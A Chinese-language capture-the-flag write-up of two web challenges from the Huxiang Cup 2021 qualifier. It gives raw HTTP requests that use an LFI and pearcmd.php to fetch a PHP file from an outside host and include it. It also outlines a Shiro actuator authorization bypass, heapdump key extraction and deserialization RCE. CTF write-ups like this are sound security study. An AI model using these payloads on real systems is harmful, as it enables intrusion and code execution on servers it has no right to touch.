湖湘杯2021 Qual WriteUp | Security @ blog.mkr.im

Web
- easywill
- Pentest in Autumn

Web#

easywill#

assign 函数将给定 name=value 设置入 _vars 中
view 中对 _vars 进行了 extract，可以控制 include $cfile 的 cfile 进行 LFI
考虑用 pearcmd 下载指定文件，并包含

GET /?name=cfile&value=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://xxx.xxx.xxx.xxx:xxxx/test.php HTTP/1.1
Host: eci-2ze2somogz02j0jitc69.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6,fr;q=0.5,zh-TW;q=0.4
Cookie: __jsluid_h=a4f1f1df7c7d63c0eb15ced6fdd9735c; PHPSESSID=c277aac7d9dfe1f26114924396b1fed5
Connection: close

GET /?name=cfile&value=/tmp/tmp/pear/download/test.php HTTP/1.1
Host: eci-2ze2somogz02j0jitc69.cloudeci1.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6,fr;q=0.5,zh-TW;q=0.4
Cookie: __jsluid_h=a4f1f1df7c7d63c0eb15ced6fdd9735c; PHPSESSID=c277aac7d9dfe1f26114924396b1fed5
Connection: close

flag 在 /ffffffff14ggggggg3

Pentest in Autumn#

/;/actuator 绕过 shiro 权限验证
/;/actuator/heapdump 获得堆内存 dump 文件
用 mat 打开
select * from org.apache.shiro.web.mgt.CookieRememberMeManager
得到 encryptionCipherKey

转换为 base64（R3Ml7uNuNB3ioj49tYV0jw==）后用 shiro_attack 工具 CommonsBeanutils1 链 RCE